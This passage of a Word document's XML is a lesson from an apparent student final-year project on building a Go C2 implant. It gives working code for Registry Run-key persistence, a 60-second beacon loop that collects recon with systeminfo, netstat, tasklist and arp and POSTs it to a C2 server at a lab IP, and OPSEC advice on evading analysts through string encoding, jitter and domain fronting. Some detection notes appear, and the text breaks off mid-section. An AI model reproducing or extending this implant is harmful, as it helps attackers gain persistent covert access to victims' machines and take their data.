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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Final Year Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Go Payload Series — Lesson 03 / Version 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net_scan_v3.go — Registry Persistence, Beacon Loop &amp; Full Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 3 is the complete functional payload — the culmination of Versions 1 and 2. Two major capabilities are added: Windows Registry persistence that survives machine reboots, and an infinite 60-second beacon loop that continuously collects and exfiltrates reconnaissance data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With this version, the payload behaves as a real C2 implant would in its early operational phase: it installs itself for persistence on first run, then enters a timed loop to periodically check in with the C2 server. Every lesson from this point forward (obfuscation, jitter, string encoding) modifies this file as its base.</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4"/>
              <w:right w:val="single" w:color="2E6DA4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F0FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK Techniques</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Registry Run Keys / Startup Folder — reg add to HKCU\...\Run ensures the payload re-executes on every user login — the most common Windows persistence mechanism.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application Layer Protocol: Web Protocols — HTTP over port 5000 used for C2 beaconing — blends with developer traffic on non-enterprise networks.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1029 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Transfer — 60-second sleep interval creates a regular beaconing pattern — detectable by network baseline analysis.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Information Discovery — Inherited from v2 — all six recon commands run every beacon cycle.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1041 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltration Over C2 Channel — Inherited from v1 — HTTP POST to Flask C2 with X-Host identification header.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1074.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Data Staging — Recon file written to C:\temp\ every cycle before exfil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2. Architecture of the Full Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The complete execution flow of Version 3 is as follows. Understanding this sequence is essential before studying the individual code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656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 Startup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os.Executable() gets the binary's own file path on disk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2. Persistence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reg add writes the binary path to HKCU Run key — runs on every login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 Loop Entry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Infinite for{} loop begins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4. Data Collection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os.MkdirAll, net.Interfaces, all six exec.Command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 File Write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os.WriteFile to C:\temp\recon_combined.txt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6. Exfiltration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sendToC2() HTTP POST with file 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 Sleep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time.Sleep(60 seconds)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8. Repeat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Returns to stage 4 indefinitely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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3. Code Walkthrough — New Additions Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The recon commands, file write, and sendToC2() function are identical to Version 2. Only the new features — persistence and the beacon loop — are documented in detail here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Getting the Binary's Own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At the very top of main(), before any other operations</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">exePath, _ := os.Executable()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">os.Executable() returns the absolute path of the currently running binary — for example C:\Users\victim\Downloads\net_scan_v3.exe. This is needed to write the correct path into the registry; a hardcoded path would break if the binary is moved or renamed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a runtime self-discovery technique. The binary does not know where it has been deployed — it asks the OS at runtime. The blank identifier _ discards the error, which is acceptable in a lab context but should be handled in production code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Registry Run Key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regPath := `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">persistCmd := fmt.Sprintf(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    `reg add "%s" /v ReconBeacon /t REG_SZ /d "%s" /f`,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    regPath, exePath)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">exec.Command("cmd", "/C", persistCmd).Run()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This constructs and runs a reg add command that creates a string value (REG_SZ) named ReconBeacon under the HKCU Run key. The value data is the full path to our binary. Windows executes every value under this key automatically when the current user logs in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key design decisions in this implementation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HKCU (HKEY_CURRENT_USER) rather than HKLM (HKEY_LOCAL_MACHINE). HKCU does not require administrator privileges, so the persistence works even without elevated execution. The trade-off is that it only persists for the current user — if a different user logs in, the payload does not run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /f flag forces the operation without prompting for confirmation — essential for silent execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The value name ReconBeacon is hardcoded and therefore a Host Artefact. An analyst running Autoruns.exe (Sysinternals) or querying the registry would see exactly this string. The obfuscation lessons address randomising or encoding this value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: Sysmon EventID 13 logs registry value modifications. Any write to a Run key is an extremely common detection rule in enterprise SIEM environments. This is operating at the Artifacts tier of the Pyramid of Pain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 The Infinite Beacon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for {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    os.MkdirAll(`C:\temp`, 0755)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    timestamp := time.Now().Format("2006-01-02 15:04:05")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    var content string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 all recon and file write code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sendToC2(c2URL, path, hostname)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    fmt.Printf("Beacon sent at %s. Sleeping 60s...\n", timestamp)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    time.Sleep(60 * time.Second)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">for {} in Go is an infinite loop — there is no condition, so it runs until the process is killed. This is the equivalent of while(true) in other languages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The loop structure means that os.MkdirAll, all recon commands, the file write, and sendToC2() are called every cycle. The timestamp variable is re-initialised every iteration so each report has the correct generation time. The beacon counter in the header is time.Now().Unix() — the Unix epoch timestamp — which increments naturally with time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 The 60-Second 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time.Sleep(60 * time.Second)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">time.Sleep() pauses the current goroutine for the specified duration. 60 * time.Second is idiomatic Go — time.Second is a constant of type time.Duration equal to one second, and multiplying it by 60 gives one minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The 60-second interval is intentionally short for a lab environment — you can observe beacon arrival in real time. In a real red team engagement, implants typically beacon every 4 to 8 hours with ± 20% jitter added to the sleep duration. A fixed 60-second interval is a network IDS detection signature: regular periodic outbound connections to the same IP are flagged by many SIEM correlation rules. The jitter implementation is covered in the obfuscation lessons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Beacon Cycle Counter in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content += fmt.Sprintf("Beacon Cycle: %d\n\n", time.Now().Unix())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The beacon cycle counter uses the Unix epoch timestamp rather than an incrementing integer. This works because the program has no persistent state between restarts — if the binary is killed and relaunched, an incrementing counter would reset to 1. Using the Unix timestamp means each beacon is uniquely identified by when it ran, regardless of process restarts. On the C2 side, you can sort uploads by this value to reconstruct the timeline of collections.</w:t>
      </w:r>
    </w:p>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4. Full Version Progression Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The table below summarises every feature present in the complete Version 3 payload and which version introduced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Feature / Code Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="656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Introduced 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Package imports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os.MkdirAll C:\temp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Version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Network interfaces (net.Interfaces)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Version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systeminfo command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os.WriteFile to disk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Version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sendToC2() HTTP POST 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netstat -ano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Version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net localgroup administrators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tasklist /fo csv</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Version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quser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arp -a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Version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wmic logicaldisk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os.Executable() self-path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Version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Registry Run Key persistence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 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Infinite for{} beacon loop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Version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time.Sleep(60s) beacon interval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 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Beacon cycle counter (Unix timestamp)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Version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XOR string obfuscation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Obfuscation Lesson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Sleep jitter (± random interval)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Obfuscation Lesson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Compile-time symbol stripping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Obfuscation Lesson 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5. Operational Security (OPSEC) Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 3 is fully functional but operationally noisy. The following list documents the OPSEC weaknesses in the current implementation and the lesson that addresses each one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Hardcoded C2 IP Address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The string http://192.168.1.10:5000/beacon appears in plaintext in the binary. Any analyst running strings.exe on the binary immediately has your C2 address. Fix: XOR-encode all strings (Obfuscation Lesson 1). Longer-term fix: domain-fronting or a redirector in front of the true C2 IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Hardcoded Registry Key Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
